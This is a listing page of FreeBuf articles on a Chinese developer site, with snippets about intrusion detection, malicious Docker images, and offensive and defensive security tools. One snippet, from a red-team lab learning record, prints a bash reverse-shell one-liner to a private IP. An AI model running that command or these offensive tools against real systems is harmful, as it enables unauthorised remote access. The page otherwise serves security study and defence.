首页
学习
活动
专区
工具
TVP
发布

FreeBuf

专栏作者
8085
文章
9118966
阅读量
349
订阅数
Suricata+ELK(Docker化部署)数据展示
一、引言 最近有一个工作任务,需要利用Suricata作为IDS来检测出口流量,同时利用ELK进行数据的展示。在搭建过程中,发现一篇文章《使用Suricata和ELK进行流量检测》[1]记录的比较好,但不是非常符合需求,一方面是本次部署任务需要利用Docker进行ELK的部署,另一方面是其数据展示并不是很丰富。在之前的文章中《Cowrie蜜罐的Docker部署过程及Elasticsearch+Kibana可视化》中就利用Docker搭建过elasticsearch + kibana来展示过自己的蜜罐数据。这
FB客服
2023-04-26
7570
植入挖矿的Docker镜像被下载了2000万次
Palo Alto Network的安全研究员Aviv Sasson发现了30个被植入挖矿木马的Docker镜像,这些镜像总计被下载了2000万次。 安全专家检查了矿池确定挖矿的账户持有的加密货币总量。Aviv Sasson发现在两年内攻击者持有的最大的矿池挖掘了价值20万美元的加密货币。 在容器镜像中植入挖矿木马是一种快速利用他人计算机资源帮助攻击者挖掘加密货币的方式。安全专家在深入调查了Docker Hub后,发现了30个恶意镜像,共计被拉取2000万次,攻击者利用此获利超过20万美元。 Docker
FB客服
2023-04-26
2890
数百个Docker容器镜像中隐藏漏洞,下载量高达数十亿次
Rezilion发现了数百个Docker容器镜像的存在,这些镜像包含了大多数标准漏洞扫描器和SCA工具都没有检测到的漏洞。 研究发现,数百个Docker容器镜像中隐藏着许多高危险性/关键性的漏洞,这些容器镜像的下载量合计达数十亿次。其中包括已被公开的高知名漏洞。 一些隐藏的漏洞在野外被积极利用,这些漏洞是CISA已知被利用漏洞合集中的一部分,包括CVE-2021-42013、CVE-2021-41773、CVE-2019-17558。 经过研究发现漏洞存在的根本原因是无法检测未被软件包管理器管理的软件组件
FB客服
2023-02-27
2890
网络攻防对抗之“左右互搏术”
本文介绍了一种从攻防两个维度研究分析网络安全对抗技术的方法。该方法基于Sysmon日志、ATT&CK标签日志、操作系统日志的分析实践,通过几种典型攻防对抗技术示例,着重介绍和分析攻击在主机层面特征,为蓝队人员“看得见”“看得清”网络威胁,提供了一种简单易学的技术修炼方法。也借此抛砖引玉,希望在安全规则优化或威胁狩猎的专家能有更多此方面技术分享。 “左右互搏术”  这里的“左右互搏术”,喻意为安全人员一边模拟红队或入侵者或企业内恶意人员的攻击,一边作为防守方从网络、主机等多层面检测和分析攻击,有助于安全人员
FB客服
2023-02-24
1.1K0
Fuxploider:一款针对文件上传漏洞的安全检测与研究工具
 关于Fuxploider  Fuxploider是一款功能强大的开源渗透测试工具,该工具专门针对文件上传漏洞而设计,可以帮助广大研究人员以自动化的方式检测和利用目标站点文件上传表单中的安全问题。 该工具能够检测允许上传的文件类型,并能够检测哪种技术最适合在目标Web服务器上上传Web Shell或任何恶意文件。  工具下载  由于该工具基于Python 3.6开发,因此我们首先需要在本地设备上安装并配置好Python 3.6+环境。 接下来,广大研究人员可以使用下列命令将该项目源码克隆至本地: git
FB客服
2023-02-24
1.2K0
Domain Analyzer:一款针对域名安全的审计分析与信息收集工具
 关于Domain Analyzer  Domain Analyzer是一款针对域名安全的强大安全分析工具,该工具能够以自动化的形式寻找和报告和给定域名相关的信息。该项目的主要目的是帮助广大研究人员以无人值守的形式分析目标域名的安全问题。除此之外,该工具还包含很多其他的功能,比如说从DNS空间获取更多的域名、自动化的Nmap和Web爬虫等。 如果你想要让Nmap扫描更多的端口,或运行脚本,或在目标站点运行Web爬虫的话,还需要使用root权限。 功能特性  Domain Analyzer可以寻找与给定域名
FB客服
2023-02-24
4530
Infoga:一款针对电子邮件的公开资源情报工具
Infoga是一款针对针对电子邮件的公开资源情报工具(OSINT),该工具能够从各种公开源(搜索引擎、PGP密钥服务器和Shodan)收集电子邮件帐号信息,其中包括IP地址、主机名和国家信息等,并使用haveibeenpwned.com API来检测目标电子邮件是否泄漏。该工具是一个简单且强大的工具,该工具在渗透测试的早期阶段作用非常大,你也可以使用该工具来了解你们公司在互联网上的知名度。
FB客服
2023-02-16
5260
Subparse:一款功能强大的模块化恶意软件分析与关联框架
Subparse是一款由Josh Strochein、Aaron Baker和Odin Bernstein共同开发的模块化框架,该框架设计用于解析和索引恶意软件文件,并在可搜索的Web浏览器中显示解析过程中发现的信息。该框架是模块化的,利用了核心解析引擎、解析模块和各种为恶意软件索引添加附加信息的富集器。框架的主要输入值是恶意软件文件的目录,核心解析引擎或用户指定的解析引擎在从任何用户指定的富集引擎添加附加信息之前解析这些文件,所有这些都是在将解析的信息编入弹性搜索索引之前实现的。然后可以通过web浏览器搜索和查看收集的信息,该浏览器还允许对从任何文件收集的任何值进行过滤。
FB客服
2023-02-16
3450
Gophish:一款功能强大的开源网络钓鱼测试工具
Gophish是一款功能强大的开源网络钓鱼测试工具,该工具专为企业安全管理人员和渗透测试人员设计,该工具不仅能够帮助广大管理人员对企业员工进行安全意识培训,而且还能够快速轻松地设置和执行网络钓鱼服务。
FB客服
2023-02-10
8670
如何使用SGXRay自动化检测SGX应用中的安全漏洞
Intel SGX采用基于应键的内存加密技术来保护独立应用程序逻辑和敏感数据。要使用这种基于硬件的安全机制,需要严格的内存使用编程模型,开发者需要应用谨慎的编程实践来确保程序的安全。
FB客服
2023-02-10
5080
SecretFlow:一款功能强大的隐私保护数据分析和机器学习统一框架
SecretFlow是一款功能强大的隐私保护数据分析和机器学习统一框架,为了实现框架功能,该工具实现了下列技术方法:
FB客服
2022-11-14
6990
ATT&CK实战系列-红队评估(七)学习记录
Goby:bash -c 'exec bash -i &>/dev/tcp/192.168.0.133/8065 <&1'
FB客服
2022-11-14
1.1K0
如何使用DeadFinder寻找失效链接
DeadFinder是一款功能强大的链接分析工具,该工具可以帮助广大研究人员快速地寻找目标页面中的无效链接(死链)。所谓死链,即一个页面中存在的无法被连接的一条链接。这些链接如果一直保留在页面中的话,可能会影响SEO的效果,更严重的可能会影响整个网站的安全。因此,DeadFinder便应运而生,在该工具的帮助下,广大研究人员可以轻松识别和修改这些死链。
FB客服
2022-11-14
5420
如何使用penguinTrace在硬件层面上显示代码运行状况
penguinTrace旨在帮助广大安全研究人员更好地理解程序代码是如何在硬件级别运行的,该工具提供了一种方法,可以查看代码会编译成什么指令,然后单步执行这些指令,查看它们如何影响机器状态,以及如何映射回原始程序中的变量。
FB客服
2022-11-14
8720
ShoMon:一款针对TheHive的Shodan监控整合方案
ShoMon是一款针对TheHive的Shodan监控整合方案,该工具基于Golang开发,专为TheHive设计,经过多个版本的迭代,当前的ShoMon v2.0功能将更加强大!
FB客服
2022-11-14
5750
lsarelayx:一款功能强大的NTLM中继工具
lsarelayx是一个系统范围的NTLM中继工具,主要用于中继目标主机中基于NTLM的认证传入连接。lsarelayx将会中继任何包含了SMB的传入认证请求。由于lsarelayx可以挂钩现有的应用程序身份验证流,因此该工具还将尝试在中继完成后为原始身份验证请求提供服务。这种模式可以防止目标应用程序/协议显示错误,并使终端用户通过lsarelayx主机进行身份验证时能够正常工作。
FB客服
2022-06-08
7740
如何使用Spring4Shell-POC测试Spring4Shell漏洞
Spring4Shell-POC是一个Docker容器化的应用程序,这个应用程序中故意设计为包含了Spring4Shell漏洞(CVE-2022-22965)。该项目提供了完整的源代码,并支持广大研究人员进行自定义修改。修改完成后,只需要重新构建Docker镜像即可。
FB客服
2022-06-08
6270
FirmWire:一款功能强大的全系统基带固件仿真平台
FirmWire是一款功能强大的全系统基带固件仿真平台,在该工具的帮助下,广大研究人员可以轻松对设备基带固件系统/镜像进行模糊测试、调试或安全分析。
FB客服
2022-06-08
4090
如何使用Bore与本地主机建立通信隧道
Bore是一款功能强大的现代化命令行CLI工具,在该工具的帮助下,广大研究人员可以轻松与本地主机localhost建立通信隧道。Bore基于Rust开发,可以将本地端口暴露给远程服务器,并能够绕过标准NAT连接防火墙。
FB客服
2022-06-08
1.7K0
乌克兰 IT 军团和匿名者组织,持续攻击俄罗斯实体
俄乌战争爆发以来,匿名者组织就盯上了俄罗斯,一直对其实体组织进行大规模网络攻击。近日,Security Affairs 网站披露,匿名者黑客组织伙同乌克兰 IT 军继续对俄罗斯实体发起网络攻击。
FB客服
2022-06-08
4620
点击加载更多
社区活动
Python精品学习库
代码在线跑,知识轻松学
热点技术征文第五期
新风口Sora来袭,普通人该如何把握机会?
博客搬家 | 分享价值百万资源包
自行/邀约他人一键搬运博客,速成社区影响力并领取好礼
技术创作特训营·精选知识专栏
往期视频·干货材料·成员作品·最新动态
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档